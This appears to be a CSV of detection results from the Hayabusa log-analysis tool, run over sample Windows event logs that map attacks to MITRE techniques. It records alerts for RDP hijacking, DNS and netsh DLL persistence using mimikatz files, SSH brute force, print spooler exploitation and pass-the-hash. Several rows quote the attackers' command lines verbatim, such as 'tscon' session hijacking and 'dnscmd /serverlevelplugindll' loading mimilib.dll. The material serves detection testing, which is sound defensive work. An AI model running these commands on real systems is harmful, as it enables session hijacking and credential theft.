+2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:16.853 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\tscon.exe | PID: 0x143c | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:18.194 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:18.327 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb4 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:26.942 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1578 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:29.455 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0x864 | User: admmarsid | LID: 0x6a423",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:29.640 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144c | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:29.676 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe84 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:29.706 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0xcc8 | User: FS01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-15 06:01:05.358 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\tscon.exe | PID: 0x6e8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-15 06:01:07.150 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0x460 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-15 06:01:37.111 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1548 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-15 06:02:14.789 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5e8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-15 06:02:35.208 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5b8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
+2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: dnscmd.exe /config /serverlevelplugindll ""C:\TOOLS\Mimikatz-fev-2020\mimilib.dll"" | Path: C:\Windows\System32\dnscmd.exe | PID: 0x1498 | User: admmig | LID: 0x907c7c09",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_5848 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_5848 | Computer: - | IP Addr: - | LID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: sshd_5848 | LID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_4332 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_4332 | Computer: - | IP Addr: - | LID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: admmig | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
+2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh add helper mimikatz.exe | Path: C:\Windows\System32\netsh.exe | PID: 0xd28 | User: admmig | LID: 0x75494,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
+2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
+2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
